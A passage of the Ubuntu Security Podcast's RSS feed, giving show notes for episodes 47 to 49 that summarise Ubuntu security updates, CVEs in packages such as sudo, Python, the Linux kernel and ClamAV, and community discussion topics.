<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E050.mp3" length="31288105" type="audio/mpeg" /><itunes:duration>23:48</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 49
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-49/</link>
          <pubDate>Fri, 18 Oct 2019 14:18:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>4a49a1057918c7b343e9a3d3a318c0bab7d8d3997f2168bcece3a17c461358362c51850bc3414e7c3dfc0575bda71abd59b121437efaffcf9c5b74341e50219d</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 49</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at updates for Sudo, Python, OpenStack Octavia and more,
  plus we discuss a recent CVE for Python which resulted in erroneous
  scientific research results, and we go over some of your feedback from
  Episode 48.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at updates for Sudo, Python, OpenStack Octavia and more,
  plus we discuss a recent CVE for Python which resulted in erroneous
  scientific research results, and we go over some of your feedback from
  Episode 48.
  </itunes:summary>
        <description>  This week we look at updates for Sudo, Python, OpenStack Octavia and more,
  plus we discuss a recent CVE for Python which resulted in erroneous
  scientific research results, and we go over some of your feedback from
  Episode 48.
  </description>
        <googleplay:description>  This week we look at updates for Sudo, Python, OpenStack Octavia and more,
  plus we discuss a recent CVE for Python which resulted in erroneous
  scientific research results, and we go over some of your feedback from
  Episode 48.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at updates for Sudo, Python, OpenStack Octavia and more,
plus we discuss a recent CVE for Python which resulted in erroneous
scientific research results, and we go over some of your feedback from
Episode 48.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>27 unique CVEs addressed</p>
<h3 id="usn-4148-1-openexr-vulnerabilities-00-45">[<a href="https://usn.ubuntu.com/4148-1/">USN-4148-1</a>] OpenEXR vulnerabilities [00:45]</h3>
<ul>
<li>8 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18444">CVE-2018-18444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9115">CVE-2017-9115</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9113">CVE-2017-9113</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9111">CVE-2017-9111</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9116">CVE-2017-9116</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9112">CVE-2017-9112</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9110">CVE-2017-9110</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12596">CVE-2017-12596</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Image format developed by ILM with a high definition range for computer
imaging applications</li>
<li>Range of issues (c++ codebase)
<ul>
<li>OOB writes (usually only of a few bytes past the end of a buffer) -
assertion failure or memory corruption -&gt; crash / code execution</li>
<li>OOB reads (same) - crash</li>
</ul>
</li>
</ul>
<h3 id="usn-4149-1-unbound-vulnerability-02-06">[<a href="https://usn.ubuntu.com/4149-1/">USN-4149-1</a>] Unbound vulnerability [02:06]</h3>
<ul>
<li>1 CVEs addressed in Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-16866">CVE-2019-16866</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Validating, recursive DNS resolver</li>
<li>OOB read due to a remotely crafted NOTIFY query (source IP needs to match
an ACL) -&gt; crash</li>
</ul>
<h3 id="usn-4151-1-usn-4151-2-python-vulnerabilities-02-40">[<a href="https://usn.ubuntu.com/4151-1/">USN-4151-1</a>, <a href="https://usn.ubuntu.com/4151-2/">USN-4151-2</a>] Python vulnerabilities [02:40]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-16935">CVE-2019-16935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16056">CVE-2019-16056</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>XML-RPC server module could end up serving arbitrary JS if set via the
set_server_title() method as did not escape content</li>
<li>Python email module tries to parse email address into sender + domain -
if domain contains multiple @ chars could get confused and return wrong
output - so applications which rely on this for validating email
addresses could accept an email address which is actually invalid</li>
</ul>
<h3 id="usn-4152-1-libsoup-vulnerability-03-53">[<a href="https://usn.ubuntu.com/4152-1/">USN-4152-1</a>] libsoup vulnerability [03:53]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17266">CVE-2019-17266</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer OOB read - fails to check the specified length of message
against the actual received message - could then memcpy past the end of
the input message -&gt; crash</li>
</ul>
<h3 id="usn-4153-1-octavia-vulnerability-04-33">[<a href="https://usn.ubuntu.com/4153-1/">USN-4153-1</a>] Octavia vulnerability [04:33]</h3>
<ul>
<li>1 CVEs addressed in Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17134">CVE-2019-17134</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Amphora Images in OpenStack Octavia - fails to properly validate client
certificates for management network clients -&gt; could allow anyone with
management network access to retrieve information / issue config commands</li>
</ul>
<h3 id="usn-4154-1-sudo-vulnerability-05-06">[<a href="https://usn.ubuntu.com/4154-1/">USN-4154-1</a>] Sudo vulnerability [05:06]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14287">CVE-2019-14287</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Lots of press around a seemingly high priority privilege escalation
vulnerability - BUT requires an admin to have configured sudo with a
particular configuration (ie specifying a user can run a command as any
other user via the ALL keyword in a Runas rule). In this case if the rule
had also been configured to explicitly deny running the command as root,
this could be bypassed by the user specifying a UID of -1. So would only
affect a very small number of installations.</li>
</ul>
<h3 id="usn-4155-1-aspell-vulnerability-07-26">[<a href="https://usn.ubuntu.com/4155-1/">USN-4155-1</a>] Aspell vulnerability [07:26]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17544">CVE-2019-17544</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Stack buffer over-read - found by Google&rsquo;s oss-fuzz</li>
</ul>
<h3 id="usn-4156-1-sdl-vulnerabilities-08-03">[<a href="https://usn.ubuntu.com/4156-1/">USN-4156-1</a>] SDL vulnerabilities [08:03]</h3>
<ul>
<li>12 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-7638">CVE-2019-7638</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7637">CVE-2019-7637</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7636">CVE-2019-7636</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7635">CVE-2019-7635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7578">CVE-2019-7578</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7577">CVE-2019-7577</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7576">CVE-2019-7576</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7575">CVE-2019-7575</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7574">CVE-2019-7574</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7573">CVE-2019-7573</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7572">CVE-2019-7572</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13616">CVE-2019-13616</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Covered all the higher priority ones in <a href="https://ubuntusecuritypodcast.org/episode-48/">Episode 48</a> for SDL 2.0 - fixed
now for SDL1.2 as well, plus rolled in a bunch of fixes for lower
priority issues (buffer over-reads in WAV handling etc)</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-and-joe-talk-cves-for-bad-documentation-and-resulting-scientific-research-09-20">Alex and Joe talk CVEs for bad documentation and resulting scientific research? [09:20]</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-17514">https://nvd.nist.gov/vuln/detail/CVE-2019-17514</a></li>
</ul>
<h3 id="feedback-on-desired-features-for-20-dot-04-18-53">Feedback on desired features for 20.04 [18:53]</h3>
<ul>
<li><a href="https://discourse.ubuntu.com/t/ubuntu-security-podcast-ep-48-feedback/12922">cafzo on discourse.ubuntu.com</a> <!-- raw HTML omitted -->
<ul>
<li>encrypted home directories</li>
<li>guest-accounts</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E049.mp3" length="29867695" type="audio/mpeg" /><itunes:duration>22:45</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 48
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-48/</link>
          <pubDate>Thu, 10 Oct 2019 20:37:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>0efb781981d33bf253bba826020da4b973ac05001f4b599cfa817150fd2b4cfe4a44d6c8790e9885a37d043561ecdba098aeda75e53b56f00f858b38473eef01</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 48</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at security updates for the Linux kernel, SDL 2, ClamAV
  and more, plus Alex and Joe talk security and performance trade-offs, snaps
  and OWASP Top 10 Cloud Security recommendations, and finally Alex covers
  some recent...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at security updates for the Linux kernel, SDL 2, ClamAV
  and more, plus Alex and Joe talk security and performance trade-offs, snaps
  and OWASP Top 10 Cloud Security recommendations, and finally Alex covers
  some recent concerns about the security of the Snap Store.
  </itunes:summary>
        <description>  This week we look at security updates for the Linux kernel, SDL 2, ClamAV
  and more, plus Alex and Joe talk security and performance trade-offs, snaps
  and OWASP Top 10 Cloud Security recommendations, and finally Alex covers
  some recent concerns about the security of the Snap Store.
  </description>
        <googleplay:description>  This week we look at security updates for the Linux kernel, SDL 2, ClamAV
  and more, plus Alex and Joe talk security and performance trade-offs, snaps
  and OWASP Top 10 Cloud Security recommendations, and finally Alex covers
  some recent concerns about the security of the Snap Store.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at security updates for the Linux kernel, SDL 2, ClamAV
and more, plus Alex and Joe talk security and performance trade-offs, snaps
and OWASP Top 10 Cloud Security recommendations, and finally Alex covers
some recent concerns about the security of the Snap Store.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>31 unique CVEs addressed</p>
<h3 id="usn-4142-1-usn-4142-2-e2fsprogs-vulnerability-00-37">[<a href="https://usn.ubuntu.com/4142-1/">USN-4142-1</a>, <a href="https://usn.ubuntu.com/4142-2/">USN-4142-2</a>] e2fsprogs vulnerability [00:37]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-5094">CVE-2019-5094</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Cisco TALOS - possible code execution via OOB write to the heap for code
which handles quota support in ext4 - so possible to trigger via a
specially crafted ext4 partition - could be triggered during an fsck on
the partition etc.</li>
</ul>
<h3 id="usn-4143-1-sdl-2-dot-0-vulnerabilities-01-37">[<a href="https://usn.ubuntu.com/4143-1/">USN-4143-1</a>] SDL 2.0 vulnerabilities [01:37]</h3>
<ul>
<li>5 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-7638">CVE-2019-7638</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7637">CVE-2019-7637</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7636">CVE-2019-7636</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7635">CVE-2019-7635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-2888">CVE-2017-2888</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>3 different heap based buffer over-reads -&gt; crash, DoS</li>
<li>Heap based buffer over-write -&gt; possible code execution or at least crash -&gt; DoS</li>
<li>Integer overflow -&gt; small alloc -&gt; heap based buffer overflow -&gt; possible
code execution</li>
</ul>
<h3 id="usn-4147-1-linux-kernel-vulnerabilities-02-23">[<a href="https://usn.ubuntu.com/4147-1/">USN-4147-1</a>] Linux kernel vulnerabilities [02:23]</h3>
<ul>
<li>18 CVEs addressed in Bionic (HWE), Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15223">CVE-2019-15223</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15221">CVE-2019-15221</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15218">CVE-2019-15218</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15217">CVE-2019-15217</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9506">CVE-2019-9506</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15926">CVE-2019-15926</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15925">CVE-2019-15925</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15538">CVE-2019-15538</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15220">CVE-2019-15220</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15215">CVE-2019-15215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15212">CVE-2019-15212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15211">CVE-2019-15211</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15118">CVE-2019-15118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15117">CVE-2019-15117</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15090">CVE-2019-15090</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13631">CVE-2019-13631</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10207">CVE-2019-10207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0136">CVE-2019-0136</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read in ath6kl driver - possible to trigger remotely from the network - crash, DoS</li>
<li>Bluetooth KNOB attack</li>
<li>Crashes from malicious USB audio devices:
<ul>
<li>Infinite recursion when parsing device descriptors (if
had multiple identical device descriptors could be triggered)</li>
<li>OOB read if specified an invalid input pin</li>
</ul>
</li>
<li>OOB read in QLogic QEDI iSCSI driver</li>
<li>2 covered in <a href="https://ubuntusecuritypodcast.org/episode-46/">Episode 46</a>
<ul>
<li>Possible code execution via a NULL pointer dereference in bluetooth UART
driver - so if an attacker can map executable code at address zero can
achieve code execution - in Ubuntu we have mmap_min_addr set to a
non-zero value so this is mitigated by default</li>
<li>DoS in Intel wifi driver - allows a malicious client to knock a peer of
the network</li>
</ul>
</li>
</ul>
<h3 id="usn-4144-1-linux-kernel-vulnerabilities-05-02">[<a href="https://usn.ubuntu.com/4144-1/">USN-4144-1</a>] Linux kernel vulnerabilities [05:02]</h3>
<ul>
<li>2 CVEs addressed in Xenial (HWE), Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15538">CVE-2019-15538</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20976">CVE-2018-20976</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different XFS issues
<ul>
<li>UAF triggered from a malicious XFS image -&gt; code exection? -&gt; crash, DoS</li>
<li>CPU based DoS if can trigger a chgrp() error due to out-of-quota</li>
</ul>
</li>
</ul>
<h3 id="usn-4145-1-linux-kernel-vulnerabilities-05-46">[<a href="https://usn.ubuntu.com/4145-1/">USN-4145-1</a>] Linux kernel vulnerabilities [05:46]</h3>
<ul>
<li>11 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15926">CVE-2019-15926</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15215">CVE-2019-15215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15211">CVE-2019-15211</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13631">CVE-2019-13631</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11487">CVE-2019-11487</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10207">CVE-2019-10207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0136">CVE-2019-0136</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20976">CVE-2018-20976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20961">CVE-2018-20961</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18509">CVE-2017-18509</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-10905">CVE-2016-10905</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Most covered above</li>
</ul>
<h3 id="usn-4146-1-usn-4146-2-clamav-vulnerabilities-06-00">[<a href="https://usn.ubuntu.com/4146-1/">USN-4146-1</a>, <a href="https://usn.ubuntu.com/4146-2/">USN-4146-2</a>] ClamAV vulnerabilities [06:00]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12900">CVE-2019-12900</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12625">CVE-2019-12625</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Update to latest upstream version (0.101.4)</li>
<li>OOB read when handling crafted BZIP2 and ZIP files - was covered for
bzip2 itself in Ubuntu in <a href="https://ubuntusecuritypodcast.org/episode-38/">Episode 38</a> - vendored in clamav</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-and-joe-talk-security-and-performance-trade-offs-snaps-and-owasp-top-10-cloud-security-recommendations-07-01">Alex and Joe talk security and performance trade-offs, snaps and OWASP Top 10 Cloud Security recommendations [07:01]</h3>
<ul>
<li><a href="https://snapcraft.io/teamtime">https://snapcraft.io/teamtime</a></li>
<li><a href="https://threatpost.com/intimate-details-healthcare-workers-exposed-cloud-security/149007/">https://threatpost.com/intimate-details-healthcare-workers-exposed-cloud-security/149007/</a></li>
<li><a href="https://www.owasp.org/index.php/Category:OWASP_Cloud_%E2%80%90_10_Project">https://www.owasp.org/index.php/Category:OWASP_Cloud_%E2%80%90_10_Project</a></li>
</ul>
<h3 id="alex-addresses-some-concerns-with-the-perceived-security-of-the-snap-store-20-44">Alex addresses some concerns with the perceived security of the Snap Store [20:44]</h3>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E048.mp3" length="31349229" type="audio/mpeg" /><itunes:duration>24:39</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 47
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-47/</link>
          <pubDate>Thu, 03 Oct 2019 20:22:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>eb97d501d3fc0165d53b74fa0f831d75a0b24d77763dc3f68787f6ce5f69dfe2caab85d941d6a0b81f110683ab34cb6cc01b365791d1cf9fdd8fae29494536cb</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 47</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          We catch up on details of the past few weeks of security updates, including
  Python, curl, Linux kernel, Exim and more, plus Alex and Joe discuss the
  recent Ubuntu Engineering Sprint in Paris and building a HoneyBot for Admin
  Magazine....
        
        ]]></itunes:subtitle>
        <itunes:summary>  We catch up on details of the past few weeks of security updates, including
  Python, curl, Linux kernel, Exim and more, plus Alex and Joe discuss the
  recent Ubuntu Engineering Sprint in Paris and building a HoneyBot for Admin
  Magazine.
  </itunes:summary>
        <description>  We catch up on details of the past few weeks of security updates, including
  Python, curl, Linux kernel, Exim and more, plus Alex and Joe discuss the
  recent Ubuntu Engineering Sprint in Paris and building a HoneyBot for Admin
  Magazine.
  </description>
        <googleplay:description>  We catch up on details of the past few weeks of security updates, including
  Python, curl, Linux kernel, Exim and more, plus Alex and Joe discuss the
  recent Ubuntu Engineering Sprint in Paris and building a HoneyBot for Admin
  Magazine.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>We catch up on details of the past few weeks of security updates, including
Python, curl, Linux kernel, Exim and more, plus Alex and Joe discuss the
recent Ubuntu Engineering Sprint in Paris and building a HoneyBot for Admin
Magazine.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>93 unique CVEs addressed</p>
<h3 id="usn-4125-1-memcached-vulnerability-00-42">[<a href="https://usn.ubuntu.com/4125-1/">USN-4125-1</a>] Memcached vulnerability [00:42]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15026">CVE-2019-15026</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible stack buffer over-read when using UNIX sockets (copies address
of UNIX socket using strncpy() which could possibly read past the end of
the src buffer) - possible crash -&gt; DoS - fixed to explicitly limit
length to smallest of src/dst buffers rather than just size of dest
buffer</li>
</ul>
<h3 id="usn-4126-1-freetype-vulnerability-01-49">[<a href="https://usn.ubuntu.com/4126-1/">USN-4126-1</a>] FreeType vulnerability [01:49]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2015-9383">CVE-2015-9383</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 CVEs addressed in Precise ESM, Trusty ESM only
<ul>
<li><a href="https://ubuntu.com/security/CVE-2015-9382">CVE-2015-9382</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2015-9381">CVE-2015-9381</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>All various heap based buffer over-reads - crash -&gt; DoS</li>
</ul>
<h3 id="usn-4127-1-usn-4127-2-python-vulnerabilities-02-13">[<a href="https://usn.ubuntu.com/4127-1/">USN-4127-1</a>, <a href="https://usn.ubuntu.com/4127-2/">USN-4127-2</a>] Python vulnerabilities [02:13]</h3>
<ul>
<li>8 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9948">CVE-2019-9948</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9947">CVE-2019-9947</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9740">CVE-2019-9740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-5010">CVE-2019-5010</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10160">CVE-2019-10160</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9636">CVE-2019-9636</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20852">CVE-2018-20852</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20406">CVE-2018-20406</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4 issues in urllib:
<ul>
<li>would allow to easily open files from local file-system</li>
<li>2 different CRLF injection issues</li>
<li>specially crafted URL could cause urllib to send cookies / auth data
for wrong host
<ul>
<li>Fixed incorrectly upstream so had a two CVEs assigned</li>
</ul>
</li>
</ul>
</li>
<li>http cookiejar wouldn&rsquo;t validate URL correctly so could also send cookies
for another domain</li>
<li>Possible NULL ptr deref when parsing X509 certs if had an empty CRL
distpoint / URI</li>
<li>Possible integer overflow when serializing a tens of hundreds of
gigabytes of data via the pickle format - could cause memory exhaustion</li>
</ul>
<h3 id="usn-4128-1-usn-4128-2-tomcat-vulnerabilities-03-35">[<a href="https://usn.ubuntu.com/4128-1/">USN-4128-1</a>, <a href="https://usn.ubuntu.com/4128-2/">USN-4128-2</a>] Tomcat vulnerabilities [03:35]</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic (tomcat-8) and Bionic, Disco (tomcat-9)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-10072">CVE-2019-10072</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0199">CVE-2019-0199</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0221">CVE-2019-0221</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>HTTP/2 server would accept streams with an excessive number of SETTINGS
frames and would permit clients to keep streams open without reading /
writing anything - could lead to DoS by causing server-side threads to
block
<ul>
<li>Original fix was incomplete - so got a second CVE</li>
</ul>
</li>
<li>Possible XSS injection if using SSI printenv command as would echo user
provided data without escaping - intended only for debugging so shouldn&rsquo;t
be used in a production website anyway</li>
</ul>
<h3 id="usn-4120-2-systemd-regression-04-45">[<a href="https://usn.ubuntu.com/4120-2/">USN-4120-2</a>] systemd regression [04:45]</h3>
<ul>
<li>Affecting Bionic, Disco</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-46/">Episode 46</a> - systemd-resolved dbus access control - the update was
prepared using a pending SRU update - but this contained a regression in
networking - re-released the security fix but without this SRU update
included.</li>
</ul>
<h3 id="usn-4115-2-linux-kernel-regression-05-18">[<a href="https://usn.ubuntu.com/4115-2/">USN-4115-2</a>] Linux kernel regression [05:18]</h3>
<ul>
<li>Affecting Xenial (HWE), Bionic</li>
<li>Recent kernel update (<a href="https://ubuntusecuritypodcast.org/episode-46/">Episode 46</a>) could possibly crash on handling
fragmented packets</li>
</ul>
